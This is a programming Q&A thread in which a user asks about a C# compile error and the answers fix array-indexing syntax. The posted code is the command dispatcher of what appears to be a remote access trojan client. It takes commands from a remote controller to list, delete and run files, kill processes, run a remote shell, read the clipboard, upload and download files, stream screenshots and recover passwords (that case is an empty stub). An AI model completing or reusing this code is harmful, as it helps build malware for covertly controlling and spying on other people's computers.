# "foem1" does not contain definition for Invoke and no exitension method 'invoke'

Tags: c#, string, variables, methods

I have a problem with this command in C#:

I have problem in this line :::: (this.InvokeRequired) he send me this problem "foem1" does not contain definition for Invoke and no exitension method 'invoke' accepting a first argument of type 'form1' could not found (are you missing a using directive or an assembly reference ) – Z-one Ideas 12 mins ago

This is my code:

```
public void Befehleinterpretieren(string Befehl)
{
    string[] Befehlsteil = Befehl.Split('°');
    switch (Befehlsteil[0])
    {
        case "Information":
            DriveInfo d_1 = new DriveInfo("C:\\");
            this.Client.Textsenden("HD°" + d_1.TotalSize.ToString());
            this.Client.Textsenden("OSVersion°" + Environment.OSVersion.ToString());
            break;
        case "Filemanager":
            if (Befehlsteil[1] == "Inhalteauflisten")
            {
                string Path = Befehlsteil[2];
                if (Directory.Exists(Path) == true)
                {
                    try
                    {
                        string Inhalt = null;
                        foreach (string Ordner in (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.GetDirectories(Path, Microsoft.VisualBasic.FileIO.SearchOption.SearchTopLevelOnly))
                        {
                            Inhalt += Ordner + "*+*";
                        }
                        Inhalt += "+++";
                        foreach (string Datei in (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.GetFiles(Path, Microsoft.VisualBasic.FileIO.SearchOption.SearchTopLevelOnly))
                        {
                            Inhalt += Datei + "*+*";
                        }
                        this.Client.Textsenden("Filemanager°Inhalt°" + Path + "°" + Inhalt);
                    }
                    catch (Exception)
                    {
                        //Fehlermeldung zurücksenden
                    }
                }
            }
            else if (Befehlsteil[1] == "Löschen")
            {
                string Pfad = Befehlsteil[2];

                if (Directory.Exists(Pfad) == true)
                {
                    (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.DeleteDirectory(Pfad, Microsoft.VisualBasic.FileIO.DeleteDirectoryOption.DeleteAllContents);
                }
                else if (File.Exists(Pfad) == true)
                {
                    (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.DeleteFile(Pfad);
                }
            }
            else if (Befehlsteil[1] == "Umbennen")
            {
                string Pfad = Befehlsteil[2];

                if (Directory.Exists(Pfad) == true)
                {
                    try
                    {
                        (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.RenameDirectory(Pfad, Befehlsteil[3]);
                    }
                    catch (Exception)
                    {

                    }
                }
                else if (File.Exists(Pfad) == true)
                {
                    try
                    {
                        (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.RenameFile(Pfad, Befehlsteil[3]);
                    }
                    catch (Exception)
                    {

                    }
                }
            }
            else if (Befehlsteil[1] == "Ordnererstellen")
            {
                (new Microsoft.VisualBasic.Devices.ServerComputer()).FileSystem.CreateDirectory(Befehlsteil[2]);
            }
            else if (Befehlsteil[1] == "Starten")
            {
                if (File.Exists(Befehlsteil[2]))
                {
                    Process.Start(Befehlsteil[2]);
                }
            }
            break;
        case "ProcessManager":
            if (Befehlsteil[1] == "Refresh")
            {
                string Inhalt = null;

                foreach (Process p in Process.GetProcesses())
                {
                    Inhalt += p.ProcessName + "+++" + System.Convert.ToString(p.Id) + "*+*";
                }
                this.Client.Textsenden("ProzessListe°" + Inhalt);
            }
            else if (Befehlsteil[1] == "Kill")
            {
                try
                {
                    Process.GetProcessById(int.Parse(Befehlsteil[2])).Kill();
                }
                catch (Exception)
                {

                }
            }
            break;
        case "Shell":
            if (Befehlsteil[1] == "Start")
            {
                Shell.Start();
            }
            else if (Befehlsteil[1] == "Stop")
            {
                Shell.Stoppen();
            }
            else if (Befehlsteil[1] == "Command")
            {
                Shell.CommandAusführen(Befehlsteil[2]);
            }
            break;
        case "Clipboard":
            if (Befehlsteil[1] == "GetText")
            {
                if (this.InvokeRequired == true)
                {
                    c2 c1 = new c2(Clipboard_GetText);
                    this.Invoke(c1);
                }
                else
                {
                    Clipboard_GetText();
                }
            }
            else if (Befehlsteil[1] == "SetText")
            {
                if (this.InvokeRequired == true)
                {
                    c1 c1 = new c1(Clipboard_SetText);
                    this.Invoke(c1, Befehlsteil[2]);
                }
                else
                {
                    Clipboard_SetText(Befehlsteil[2]);
                }
            }
            else if (Befehlsteil[1] == "Clear")
            {
                if (this.InvokeRequired == true)
                {
                    c3 c3 = new c3(ClearClipboard);
                    this.Invoke(c3);
                }
                else
                {
                    ClearClipboard();
                }
            }
            break;
        case "Uploadfile":
            UploadFile U = new UploadFile();
            U.Start(this.P_IP, this.P_Port, Befehlsteil[1]);
            break;
        case "Downloadfile":
            DownloadFile D = new DownloadFile();
            D.Start(this.P_IP, this.P_Port, Befehlsteil[1], Befehlsteil[2], Befehlsteil[3]);
            break;
        case "Screenshot":
            if (Befehlsteil[1] == "Start")
            {
                UploadScreenshot.Start(this.P_IP, this.P_Port, int.Parse(Befehlsteil[2]));
            }
            else if (Befehlsteil[1] == "Stop")
            {
                UploadScreenshot.Stoppen();
            }
            break;
        case "PasswordRecovery":
            break;

        case "CloseClient":
            Application.Exit();
            break;
    }
}

delegate void c1(string sText);
delegate void c2();
delegate void c3();

private void Clipboard_GetText()
{
    this.Client.Textsenden("Clipboard°" + Clipboard.GetText());
}

private void Clipboard_SetText(string sText)
{
    if (sText != "")
    {
        Clipboard.SetText(sText);
    }
}

private void ClearClipboard()
{
    Clipboard.Clear();
}

public void Shell_TextToSend(string sText)
{
    this.Client.Textsenden("ShellOutput°" + sText);
}
```

Answer (score 3):

`Befehlsteil("0")` should be `Befehlsteil[0]`, assuming you want the first element of the array.

Similarly, `Befehlsteil(1)` should be `Befehlsteil[1]` and `Befehlsteil(2)` should be `Befehlsteil[2]`.

Comment: I am not inderstand the second solution :: You should make similar adjustments to Befehlsteil(1) and Befehlsteil(2)

Comment: I'd suggest starting by having a look at [this](https://msdn.microsoft.com/en-us/library/aa288453(v=vs.71).aspx) resource on C# arrays.

Comment: I've also edited my answer to make the last sentence clearer

Comment: Explanation: the `( )` are used to call/execute a method, the `[ ]` are used to access a specific element of an array (or list). You used `(1)` so you were trying to use it as a method (while it is an array)

Comment: I have problem in this line :::: (this.InvokeRequired) he send me this problem "foem1" does not contain definition for Invoke and no exitension method 'invoke' accepting a first argument of type 'form1' could not found (are you missing a using directive or an assembly reference )

Comment: That sounds like a separate issue, so please create a new question with the related code included.

Comment: this is all code :::